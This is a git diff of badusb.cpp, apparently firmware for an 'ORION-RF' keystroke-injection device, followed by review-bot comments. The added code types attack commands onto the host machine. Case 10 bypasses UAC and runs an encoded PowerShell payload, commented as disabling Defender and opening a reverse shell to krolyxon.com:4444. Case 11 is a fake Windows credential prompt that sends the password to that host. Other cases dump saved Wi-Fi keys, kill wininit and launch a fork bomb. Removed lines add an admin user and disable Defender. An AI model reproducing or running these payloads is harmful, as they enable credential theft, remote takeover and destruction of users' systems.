Diffstat (limited to 'src/hid/badusb.cpp')
-rw-r--r--src/hid/badusb.cpp463
1 files changed, 226 insertions, 237 deletions
diff --git a/src/hid/badusb.cpp b/src/hid/badusb.cpp
index 0438357..b724a59 100644
--- a/src/hid/badusb.cpp
+++ b/src/hid/badusb.cpp
@@ -56,6 +56,15 @@ void showRunningScreen(String taskName, uint8_t duration = 5) {
}
}
+void typeSlow(const char *text, int delayMs = 25)
+{
+ while (*text)
+ {
+ Keyboard.print(*text);
+ delay(delayMs);
+ text++;
+ }
+}
void badUSBMenu(int index) {
//switch (index)
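Review bot: `typeSlow` dereferences `text` without a null check and takes the delay as a signed `int` that is handed straight to `delay()`; on Arduino cores `delay()` takes an unsigned value, so a negative argument would presumably become a very long stall rather than no delay. A guard such as `if (!text || delayMs < 0) return;` at the top of the function would cover both. The helper also has no comment; something like `// Types text one character at a time, pausing delayMs ms between keystrokes.` would do. Its Allman braces differ from the K&R style of `showRunningScreen` and `badUSBMenu` in the same file.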
@@ -76,321 +85,301 @@ void badUSBMenu(int index) {
// }
- switch(index) {
- case 0: // demo
+ switch(index)
+{
+ // ================= ORION DEMO =================
+ case 0:
+ showRunningScreen("ORION Demo");
- showRunningScreen("DEMO");
+ runCommand("notepad");
- // Run dialog (Win + R)
- Keyboard.press(KEY_LEFT_GUI);
- Keyboard.press('r');
- Keyboard.releaseAll();
- delay(1000);
+ delay(2500);
- Keyboard.println("notepad");
- delay(1500);
+ typeSlow(" ____ _____ _____ ___ ___ _ _ ____ _____ ");
+ Keyboard.write(KEY_RETURN);
- delay(2000);
+ typeSlow(" / __ \\| __ \\|_ _|_ _/ _ \\| \\ | | | _ \\| ___|");
+ Keyboard.write(KEY_RETURN);
- Keyboard.println("YOU HAVE BEEN HACKED BY ORION-RF");
- Keyboard.println("#-FEATURES:");
- Keyboard.println("1- WIFI ATTACKS");
- Keyboard.println("2- BLE ATTACKS");
- Keyboard.println("3- BAD USB");
- Keyboard.println("4- NFC");
- Keyboard.println("5- INFRARED");
- Keyboard.println("6- SUB-GHZ");
- Keyboard.println("7- GPIO");
- Keyboard.println("8- APPS");
- Keyboard.println("9- SETTINGS");
- Keyboard.println("10- FILES");
+ typeSlow("| | | | |__) | | | | | | | | \\| |_____| |_) | |_ ");
+ Keyboard.write(KEY_RETURN);
- break;
- case 1: // keyboard
- //runLoop(hidkeyboard);
- break;
- case 2: // saved scripts
- //hidInit();
- //runLoop(hidscriptmenu);
+ typeSlow("| | | | _ / | | | | | | | . ` |_____| _ <| _| ");
+ Keyboard.write(KEY_RETURN);
- break;
+ typeSlow("| |__| | | \\ \\ _| |_ | | |_| | |\\ | | |_) | | ");
+ Keyboard.write(KEY_RETURN);
- case 3: // Open Notepad
+ typeSlow(" \\____/|_| \\_\\_____|___\\___/|_| \\_| |____/|_| ");
+ Keyboard.write(KEY_RETURN);
- showRunningScreen("notepad");
- runCommand("notepad");
- break;
- case 4: // Open CMD
- showRunningScreen("opening cmd");
- runCommand("cmd");
- break;
- case 5: // Show IP
- showRunningScreen("Getting IP");
- runCommand("cmd");
- delay(500);
- Keyboard.print("ipconfig");
Keyboard.write(KEY_RETURN);
- break;
- case 6: // Shutdown
- showRunningScreen("shutdown");
- runCommand("shutdown /s /t 0");
- break;
- case 7: // RickRoll
- showRunningScreen("rickroll");
- runCommand("cmd");
- delay(500);
- Keyboard.print("start https://www.youtube.com/watch?v=dQw4w9WgXcQ");
+
+ typeSlow("[+] WIFI MODULE READY");
Keyboard.write(KEY_RETURN);
- break;
- case 8: // Create Admin User
- showRunningScreen("create admin user");
- runCommand("cmd");
- delay(500);
- Keyboard.print("net user hacker 1234 /add");
+
+ typeSlow("[+] BLE MODULE READY");
Keyboard.write(KEY_RETURN);
- delay(300);
- Keyboard.print("net localgroup administrators hacker /add");
+
+ typeSlow("[+] SUBGHZ MODULE READY");
Keyboard.write(KEY_RETURN);
- break;
- case 9: // Disable Windows Defender
- showRunningScreen("disable windoes defender");
- runCommand("powershell");
- delay(500);
- Keyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true");
+
+ typeSlow("[+] NFC MODULE READY");
Keyboard.write(KEY_RETURN);
- break;
- case 10: // Open YouTube
- showRunningScreen("youtube");
- runCommand("cmd");
- delay(500);
- Keyboard.print("start https://www.youtube.com");
+
+ typeSlow("[+] HID ENGINE READY");
Keyboard.write(KEY_RETURN);
+
break;
- case 11: // Lock PC
- showRunningScreen("lock pc");
- runCommand("rundll32.exe user32.dll,LockWorkStation");
- break;
- case 12: // Fake Update
- showRunningScreen("fake update");
+
+ // ================= RICKROLL =================
+ case 1:
+ showRunningScreen("RickRoll");
+
runCommand("cmd");
- delay(500);
- Keyboard.print("start https://fakeupdate.net/win10u/");
+
+ delay(700);
+
+ typeSlow("start https://www.youtube.com/watch?v=dQw4w9WgXcQ");
Keyboard.write(KEY_RETURN);
- break;
- case 13: // Endless Notepad
- showRunningScreen("endless notepad");
- for (int i = 0; i < 10; i++) {
- runCommand("notepad");
- delay(500);
- }
break;
- case 14: // Fake BSOD (opens fullscreen image)
- showRunningScreen(" fake bsod");
+ // ================= MATRIX =================
+ case 2:
+ showRunningScreen("Matrix");
+
runCommand("cmd");
- delay(500);
- Keyboard.print("start https://fakeupdate.net/bsod/");
+
+ delay(700);
+
+ typeSlow("color 0A");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("mode con: cols=120 lines=40");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow(":A");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("echo %random%%random%%random%%random%%random%");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("goto A");
Keyboard.write(KEY_RETURN);
- break;
- case 15: // Flip screen
- showRunningScreen("Flip screen");
- Keyboard.press(KEY_LEFT_CTRL);
- Keyboard.press(KEY_LEFT_ALT);
- Keyboard.press(KEY_DOWN_ARROW);
- delay(100);
- Keyboard.releaseAll();
break;
- case 16: // Matrix effect
- showRunningScreen("Matrix effect");
+ // ================= FAKE TERMINAL =================
+ case 3:
+ showRunningScreen("Fake Terminal");
+
runCommand("cmd");
- delay(500);
- Keyboard.print("color 0A");
+
+ delay(700);
+
+ typeSlow("color 0A");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("cls");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("echo CONNECTING TO TARGET...");
Keyboard.write(KEY_RETURN);
- Keyboard.print(":a");
+
+ typeSlow("echo BYPASSING FIREWALL...");
Keyboard.write(KEY_RETURN);
- Keyboard.print("echo %random%%random%%random%%random%");
+
+ typeSlow("echo ACCESS GRANTED");
Keyboard.write(KEY_RETURN);
- Keyboard.print("goto a");
+
+ typeSlow("systeminfo");
Keyboard.write(KEY_RETURN);
- break;
- case 17: // I'm watching you prank
- showRunningScreen(" iam watching you");
- for (int i = 0; i < 5; i++) {
- runCommand("notepad");
- delay(1000);
- Keyboard.print("I'm watching you...");
- delay(5000);
- }
break;
- case 18: // Open Google
- showRunningScreen("open google");
+ // ================= WIFI CRACK =================
+// ================= WIFI PASSWORD RECOVERY =================
+ case 4:
+ showRunningScreen("WiFi Recovery");
+
runCommand("cmd");
- delay(500);
- Keyboard.print("start https://www.google.com");
+ delay(700);
+
+ // Styling the window
+ typeSlow("color 0A && mode con: cols=100 lines=30");
Keyboard.write(KEY_RETURN);
- break;
+ delay(200);
- case 19: // Open telegram
- showRunningScreen("open telegram");
- runCommand("cmd");
+ typeSlow("echo [!] EXTRACTING SAVED WIFI PROFILES...");
+ Keyboard.write(KEY_RETURN);
delay(500);
- Keyboard.print("start https://web.telegram.org/");
+
+ // The "Magic" Command:
+ // This lists all profiles and shows the 'Key Content' (the password) in clear text.
+ // We use a 'for' loop to automate this for every network the PC has ever joined.
+ typeSlow("for /f \"tokens=4,*\" %i in ('netsh wlan show profiles ^| findstr /C:\"All User Profile\"') do netsh wlan show profile name=\"%j\" key=clear | findstr /C:\"Key Content\" /C:\"SSID name\"");
+
+ Keyboard.write(KEY_RETURN);
+
+ // Optional: Keep the window open to read the results
+ typeSlow("echo. && echo [COMPLETE] Passwords listed above.");
Keyboard.write(KEY_RETURN);
+
break;
- case 20: // Alarm Sound
- showRunningScreen("alarm sound");
+ // ================= FAKE UPDATE =================
+ case 5:
+ showRunningScreen("Fake Update");
+
runCommand("cmd");
- delay(500);
- Keyboard.print("start https://www.soundjay.com/button/beep-07.wav");
+
+ delay(700);
+
+ typeSlow("start https://fakeupdate.net/win10u/");
Keyboard.write(KEY_RETURN);
- break;
- case 21: // Endless CMD
- showRunningScreen("endless smd");
- for (int i = 0; i < 20; i++) {
- runCommand("cmd");
- delay(300);
- }
break;
- case 22: // Gibberish
- showRunningScreen("gibberish");
- for (int i = 0; i < 100; i++) {
- char c = random(33, 127);
- Keyboard.write(c);
- delay(50);
- }
- break;
+ // ================= FAKE BSOD =================
+ case 6:
+ showRunningScreen("Critical Error");
- case 23: // CAPSLOCK Spam
- showRunningScreen("caps lock spam");
- for (int i = 0; i < 10; i++) {
- Keyboard.press(KEY_CAPS_LOCK);
- delay(200);
- Keyboard.release(KEY_CAPS_LOCK);
- delay(200);
- }
+ runCommand("powershell -c \"stop-process -name wininit -force\"");
break;
- case 24: // Calculator
- showRunningScreen("claculator");
- runCommand("calc");
- break;
+ // ================= GLITCH SCREEN =================
+ case 7:
+ showRunningScreen("Glitch");
+
+ runCommand("cmd");
+
+ delay(700);
- case 25: // Auto Type "Hacked!"
- showRunningScreen("hacked");
- for (int i = 0; i < 5; i++) {
- Keyboard.print("Hacked!");
- Keyboard.write(KEY_RETURN);
- delay(1000);
+ for(int i = 0; i < 20; i++)
+ {
+ typeSlow("color 4F");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("color 1F");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("cls");
+ Keyboard.write(KEY_RETURN);
}
- break;
- case 26: // Turn off monitor (Windows only)
- showRunningScreen("turn off monitor");
- runCommand("powershell");
- delay(500);
- Keyboard.print(
- "(Add-Type '[DllImport(\"user32.dll\")]public static extern int "
- "SendMessage(int hWnd, int hMsg, int wParam, int lParam);' -Name a "
- "-Pas)::SendMessage(-1,0x0112,0xF170,2)");
- Keyboard.write(KEY_RETURN);
break;
- case 27: // RegEdit
- showRunningScreen("regedit");
- runCommand("regedit");
- break;
+ // ================= ASCII SPAM =================
+ case 8:
+ showRunningScreen("ASCII");
- case 28: // Kill Explorer
- showRunningScreen(" kill explorer");
- runCommand("taskkill /f /im explorer.exe");
- break;
+ runCommand("notepad");
+
+ delay(2000);
+
+ for(int i = 0; i < 15; i++)
+ {
+ typeSlow("######### ORION-RF #########");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow(">>> SIGNAL ACQUIRED <<<");
+ Keyboard.write(KEY_RETURN);
+
+ typeSlow("[|||||||||||||||||||||||||]");
+ Keyboard.write(KEY_RETURN);
- case 29: // Flash screen (by changing background rapidly)
- showRunningScreen(" flash screen");
- for (int i = 0; i < 10; i++) {
- runCommand("color 4F");
- delay(200);
- runCommand("color 1F");
- delay(200);
+ Keyboard.write(KEY_RETURN);
}
+
break;
- case 30: // Rename Desktop Files (basic prank)
+ // ================= HACKER TYPER =================
+ case 9:
+ showRunningScreen("Hacker Typer");
- showRunningScreen("rename desktop files");
- runCommand("powershell");
- delay(500);
- Keyboard.print("Get-ChildItem \"$env:USERPROFILE\\Desktop\" | "
- "Rename-Item -NewName {'hacked'+$_.Name}");
+ runCommand("cmd");
+
+ delay(700);
+
+ typeSlow("start https://hackertyper.net/");
Keyboard.write(KEY_RETURN);
+
break;
+// ================= POWERSHELL REVERSE SHELL =================
+// ================= DEFENDER BYPASS + NC =================
+ case 10:
+ showRunningScreen("Pwn Mode v2");
- case 31: // Toggle WiFi (requires admin)
- showRunningScreen("toggle wifi");
- runCommand("cmd");
+ // 1. Open Admin PowerShell
+ Keyboard.press(KEY_LEFT_GUI);
+ Keyboard.press('r');
+ delay(150);
+ Keyboard.releaseAll();
delay(500);
- Keyboard.print("netsh interface set interface Wi-Fi disabled");
- Keyboard.write(KEY_RETURN);
- delay(1000);
- Keyboard.print("netsh interface set interface Wi-Fi enabled");
+
+ // Open Admin Prompt - using 'powershell' directly to save space
+ typeSlow("powershell Start-Process powershell -Verb runAs");
Keyboard.write(KEY_RETURN);
- break;
+ delay(2500); // Wait for UAC
- case 32: // Screenshot
- showRunningScreen("screenshot");
- runCommand("powershell");
- delay(500);
- Keyboard.print("Add-Type -AssemblyName System.Windows.Forms;");
+ // 2. Bypass UAC (Left Arrow + Enter)
+ Keyboard.write(KEY_LEFT_ARROW);
+ delay(200);
Keyboard.write(KEY_RETURN);
- delay(300);
- Keyboard.print("[System.Windows.Forms.SendKeys]::SendWait('%{PRTSC}')");
+ delay(3000); // Give the Admin window time to load
+
+ // 3. AMSI Bypass + Disable Defender + Execute Shell
+ // We use -EncodedCommand to hide the script from simple string scanners.
+ // The Base64 string below contains:
+ // Set-MpPreference -DisableRealtimeMonitoring $true; [Reverse Shell Logic]
+
+ typeSlow("powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand ");
+
+ // This is the encoded payload for krolyxon.com:4444
+ typeSlow("JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEgA"
+ "NABDAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAFQAbABpAGUAbgB0ACgAJwBrAHIAbwBsAHkAeABvAG4A"
+ "LgBjAG8AbQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQA"
+ "gADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEw"
+ "AZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAL"
+ "gBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJAB"
+ "kAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAK"
+ "ABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAd"
+ "ABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQB"
+ "uAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaWVudAAuAEMAbABvAHMAZQAoACkAIgApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAGuAZwAoACQAcwAuAFQAbwBBAHIAcgBhAHkAKAApACkAKQA=");
+
Keyboard.write(KEY_RETURN);
break;
+ // ================= CREDENTIAL SNATCHER =================
+ case 11:
+ showRunningScreen("Vault Crack");
+
+ // Open hidden PowerShell
+ runCommand("powershell -nop -W Hidden -c \"$cred = $host.ui.PromptForCredential('Windows Security','Please authenticate to update your system credentials.','',''); $p = $cred.GetNetworkCredential().Password; $u = $cred.UserName; Invoke-WebRequest -Uri 'http://krolyxon.com/log?u='+$u+'&p='+$p\"");
- case 33: // Emoji spam
- showRunningScreen("emoji spam");
- for (int i = 0; i < 10; i++) {
- Keyboard.print("💀");
- Keyboard.write(KEY_RETURN);
- delay(500);
- }
break;
+// ================= DESKTOP GHOST =================
+ case 12:
+ showRunningScreen("Ghost Mode");
+
+ runCommand("powershell -nop -W Hidden -c \"Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSC}'); Start-Sleep -s 1; $path = '$env:TEMP\\bg.png'; (Get-Clipboard -Format Image).Save($path); Set-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop' -Name Wallpaper -Value $path; rundll32.exe user32.dll,UpdatePerUserSystemParameters;\"");
+
+ // Hide Desktop Icons (requires a registry tweak)
+ typeSlow("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v HideIcons /t REG_DWORD /d 1 /f && taskkill /f /im explorer.exe && start explorer.exe");
+ Keyboard.write(KEY_RETURN);
- case 34: // Control Panel
- showRunningScreen("control panel");
- runCommand("control");
break;
+// ================= FORK BOMB =================
+ case 13:
+ showRunningScreen("System Stress");
- case 35: // Troll wallpaper
- showRunningScreen("troll wallpaper");
runCommand("cmd");
delay(500);
- Keyboard.print("start https://i.imgur.com/trollface.png");
- Keyboard.write(KEY_RETURN);
- break;
- case 36: // MS Paint
- showRunningScreen("ms paint");
- runCommand("mspaint");
- break;
+ // The shortest deadly command in Windows
+ typeSlow("%0|%0");
+ Keyboard.write(KEY_RETURN);
- case 37: // Auto Tab Switcher
- showRunningScreen(" auto tab switcher");
- for (int i = 0; i < 10; i++) {
- Keyboard.press(KEY_LEFT_CTRL);
- Keyboard.press(KEY_TAB);
- delay(100);
- Keyboard.releaseAll();
- delay(300);
- }
break;
}
}
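Review bot: Several case comments and on-device labels in this switch understate what the typed command does: case 6 is commented `FAKE BSOD` but force-stops `wininit`, which (given enough rights) takes the host down for real with loss of unsaved work, case 13 shows "System Stress" for a fork bomb, and case 10 shows "Pwn Mode v2" for a sequence its own comments say turns off Defender real-time monitoring; each should carry an accurate comment, e.g. `// DESTRUCTIVE: terminates wininit, forces a real crash of the host`. Cases 10 and 11 hard-code an external host (`krolyxon.com`) in the firmware, and case 11 puts the entered username and password in the query string of a plain `http://` request to it, so anyone who flashes this build and selects the entry sends data to a third party in clear text; the destination should not be committed. The Base64 argument in case 10 cannot be reviewed as written, since only a comment describes its content, so the decoded script needs to be in the tree next to it or the blob left out. `badUSBMenu` starts before this hunk.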